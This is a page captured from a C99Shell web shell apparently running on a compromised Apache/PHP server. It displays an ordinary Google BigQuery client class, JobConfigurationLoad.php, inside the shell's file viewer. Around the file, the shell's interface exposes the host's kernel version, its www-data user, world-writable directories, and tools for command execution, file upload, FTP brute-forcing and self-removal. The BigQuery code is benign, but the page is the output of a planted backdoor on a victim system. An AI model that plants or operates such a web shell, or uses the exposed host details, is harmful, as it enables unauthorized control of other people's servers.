!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/dokan/script/vendor/google/apiclient-services/src/Google/Service/Bigquery/   drwxrwxrwx
Free 13.03 GB of 57.97 GB (22.48%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     JobConfigurationLoad.php (9.6 KB)      -rwxrwxrwx
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * Copyright 2014 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License"); you may not
 * use this file except in compliance with the License. You may obtain a copy of
 * the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
 * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
 * License for the specific language governing permissions and limitations under
 * the License.
 */

class Google_Service_Bigquery_JobConfigurationLoad extends Google_Collection
{
  protected 
$collection_key 'sourceUris';
  public 
$allowJaggedRows;
  public 
$allowQuotedNewlines;
  public 
$autodetect;
  protected 
$clusteringType 'Google_Service_Bigquery_Clustering';
  protected 
$clusteringDataType '';
  public 
$createDisposition;
  public 
$decimalTargetTypes;
  protected 
$destinationEncryptionConfigurationType 'Google_Service_Bigquery_EncryptionConfiguration';
  protected 
$destinationEncryptionConfigurationDataType '';
  protected 
$destinationTableType 'Google_Service_Bigquery_TableReference';
  protected 
$destinationTableDataType '';
  protected 
$destinationTablePropertiesType 'Google_Service_Bigquery_DestinationTableProperties';
  protected 
$destinationTablePropertiesDataType '';
  public 
$encoding;
  public 
$fieldDelimiter;
  protected 
$hivePartitioningOptionsType 'Google_Service_Bigquery_HivePartitioningOptions';
  protected 
$hivePartitioningOptionsDataType '';
  public 
$ignoreUnknownValues;
  public 
$jsonExtension;
  public 
$maxBadRecords;
  public 
$nullMarker;
  protected 
$parquetOptionsType 'Google_Service_Bigquery_ParquetOptions';
  protected 
$parquetOptionsDataType '';
  public 
$projectionFields;
  public 
$quote;
  protected 
$rangePartitioningType 'Google_Service_Bigquery_RangePartitioning';
  protected 
$rangePartitioningDataType '';
  protected 
$schemaType 'Google_Service_Bigquery_TableSchema';
  protected 
$schemaDataType '';
  public 
$schemaInline;
  public 
$schemaInlineFormat;
  public 
$schemaUpdateOptions;
  public 
$skipLeadingRows;
  public 
$sourceFormat;
  public 
$sourceUris;
  protected 
$timePartitioningType 'Google_Service_Bigquery_TimePartitioning';
  protected 
$timePartitioningDataType '';
  public 
$useAvroLogicalTypes;
  public 
$writeDisposition;

  public function 
setAllowJaggedRows($allowJaggedRows)
  {
    
$this->allowJaggedRows $allowJaggedRows;
  }
  public function 
getAllowJaggedRows()
  {
    return 
$this->allowJaggedRows;
  }
  public function 
setAllowQuotedNewlines($allowQuotedNewlines)
  {
    
$this->allowQuotedNewlines $allowQuotedNewlines;
  }
  public function 
getAllowQuotedNewlines()
  {
    return 
$this->allowQuotedNewlines;
  }
  public function 
setAutodetect($autodetect)
  {
    
$this->autodetect $autodetect;
  }
  public function 
getAutodetect()
  {
    return 
$this->autodetect;
  }
  
/**
   * @param Google_Service_Bigquery_Clustering
   */
  
public function setClustering(Google_Service_Bigquery_Clustering $clustering)
  {
    
$this->clustering $clustering;
  }
  
/**
   * @return Google_Service_Bigquery_Clustering
   */
  
public function getClustering()
  {
    return 
$this->clustering;
  }
  public function 
setCreateDisposition($createDisposition)
  {
    
$this->createDisposition $createDisposition;
  }
  public function 
getCreateDisposition()
  {
    return 
$this->createDisposition;
  }
  public function 
setDecimalTargetTypes($decimalTargetTypes)
  {
    
$this->decimalTargetTypes $decimalTargetTypes;
  }
  public function 
getDecimalTargetTypes()
  {
    return 
$this->decimalTargetTypes;
  }
  
/**
   * @param Google_Service_Bigquery_EncryptionConfiguration
   */
  
public function setDestinationEncryptionConfiguration(Google_Service_Bigquery_EncryptionConfiguration $destinationEncryptionConfiguration)
  {
    
$this->destinationEncryptionConfiguration $destinationEncryptionConfiguration;
  }
  
/**
   * @return Google_Service_Bigquery_EncryptionConfiguration
   */
  
public function getDestinationEncryptionConfiguration()
  {
    return 
$this->destinationEncryptionConfiguration;
  }
  
/**
   * @param Google_Service_Bigquery_TableReference
   */
  
public function setDestinationTable(Google_Service_Bigquery_TableReference $destinationTable)
  {
    
$this->destinationTable $destinationTable;
  }
  
/**
   * @return Google_Service_Bigquery_TableReference
   */
  
public function getDestinationTable()
  {
    return 
$this->destinationTable;
  }
  
/**
   * @param Google_Service_Bigquery_DestinationTableProperties
   */
  
public function setDestinationTableProperties(Google_Service_Bigquery_DestinationTableProperties $destinationTableProperties)
  {
    
$this->destinationTableProperties $destinationTableProperties;
  }
  
/**
   * @return Google_Service_Bigquery_DestinationTableProperties
   */
  
public function getDestinationTableProperties()
  {
    return 
$this->destinationTableProperties;
  }
  public function 
setEncoding($encoding)
  {
    
$this->encoding $encoding;
  }
  public function 
getEncoding()
  {
    return 
$this->encoding;
  }
  public function 
setFieldDelimiter($fieldDelimiter)
  {
    
$this->fieldDelimiter $fieldDelimiter;
  }
  public function 
getFieldDelimiter()
  {
    return 
$this->fieldDelimiter;
  }
  
/**
   * @param Google_Service_Bigquery_HivePartitioningOptions
   */
  
public function setHivePartitioningOptions(Google_Service_Bigquery_HivePartitioningOptions $hivePartitioningOptions)
  {
    
$this->hivePartitioningOptions $hivePartitioningOptions;
  }
  
/**
   * @return Google_Service_Bigquery_HivePartitioningOptions
   */
  
public function getHivePartitioningOptions()
  {
    return 
$this->hivePartitioningOptions;
  }
  public function 
setIgnoreUnknownValues($ignoreUnknownValues)
  {
    
$this->ignoreUnknownValues $ignoreUnknownValues;
  }
  public function 
getIgnoreUnknownValues()
  {
    return 
$this->ignoreUnknownValues;
  }
  public function 
setJsonExtension($jsonExtension)
  {
    
$this->jsonExtension $jsonExtension;
  }
  public function 
getJsonExtension()
  {
    return 
$this->jsonExtension;
  }
  public function 
setMaxBadRecords($maxBadRecords)
  {
    
$this->maxBadRecords $maxBadRecords;
  }
  public function 
getMaxBadRecords()
  {
    return 
$this->maxBadRecords;
  }
  public function 
setNullMarker($nullMarker)
  {
    
$this->nullMarker $nullMarker;
  }
  public function 
getNullMarker()
  {
    return 
$this->nullMarker;
  }
  
/**
   * @param Google_Service_Bigquery_ParquetOptions
   */
  
public function setParquetOptions(Google_Service_Bigquery_ParquetOptions $parquetOptions)
  {
    
$this->parquetOptions $parquetOptions;
  }
  
/**
   * @return Google_Service_Bigquery_ParquetOptions
   */
  
public function getParquetOptions()
  {
    return 
$this->parquetOptions;
  }
  public function 
setProjectionFields($projectionFields)
  {
    
$this->projectionFields $projectionFields;
  }
  public function 
getProjectionFields()
  {
    return 
$this->projectionFields;
  }
  public function 
setQuote($quote)
  {
    
$this->quote $quote;
  }
  public function 
getQuote()
  {
    return 
$this->quote;
  }
  
/**
   * @param Google_Service_Bigquery_RangePartitioning
   */
  
public function setRangePartitioning(Google_Service_Bigquery_RangePartitioning $rangePartitioning)
  {
    
$this->rangePartitioning $rangePartitioning;
  }
  
/**
   * @return Google_Service_Bigquery_RangePartitioning
   */
  
public function getRangePartitioning()
  {
    return 
$this->rangePartitioning;
  }
  
/**
   * @param Google_Service_Bigquery_TableSchema
   */
  
public function setSchema(Google_Service_Bigquery_TableSchema $schema)
  {
    
$this->schema $schema;
  }
  
/**
   * @return Google_Service_Bigquery_TableSchema
   */
  
public function getSchema()
  {
    return 
$this->schema;
  }
  public function 
setSchemaInline($schemaInline)
  {
    
$this->schemaInline $schemaInline;
  }
  public function 
getSchemaInline()
  {
    return 
$this->schemaInline;
  }
  public function 
setSchemaInlineFormat($schemaInlineFormat)
  {
    
$this->schemaInlineFormat $schemaInlineFormat;
  }
  public function 
getSchemaInlineFormat()
  {
    return 
$this->schemaInlineFormat;
  }
  public function 
setSchemaUpdateOptions($schemaUpdateOptions)
  {
    
$this->schemaUpdateOptions $schemaUpdateOptions;
  }
  public function 
getSchemaUpdateOptions()
  {
    return 
$this->schemaUpdateOptions;
  }
  public function 
setSkipLeadingRows($skipLeadingRows)
  {
    
$this->skipLeadingRows $skipLeadingRows;
  }
  public function 
getSkipLeadingRows()
  {
    return 
$this->skipLeadingRows;
  }
  public function 
setSourceFormat($sourceFormat)
  {
    
$this->sourceFormat $sourceFormat;
  }
  public function 
getSourceFormat()
  {
    return 
$this->sourceFormat;
  }
  public function 
setSourceUris($sourceUris)
  {
    
$this->sourceUris $sourceUris;
  }
  public function 
getSourceUris()
  {
    return 
$this->sourceUris;
  }
  
/**
   * @param Google_Service_Bigquery_TimePartitioning
   */
  
public function setTimePartitioning(Google_Service_Bigquery_TimePartitioning $timePartitioning)
  {
    
$this->timePartitioning $timePartitioning;
  }
  
/**
   * @return Google_Service_Bigquery_TimePartitioning
   */
  
public function getTimePartitioning()
  {
    return 
$this->timePartitioning;
  }
  public function 
setUseAvroLogicalTypes($useAvroLogicalTypes)
  {
    
$this->useAvroLogicalTypes $useAvroLogicalTypes;
  }
  public function 
getUseAvroLogicalTypes()
  {
    return 
$this->useAvroLogicalTypes;
  }
  public function 
setWriteDisposition($writeDisposition)
  {
    
$this->writeDisposition $writeDisposition;
  }
  public function 
getWriteDisposition()
  {
    return 
$this->writeDisposition;
  }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0127 ]--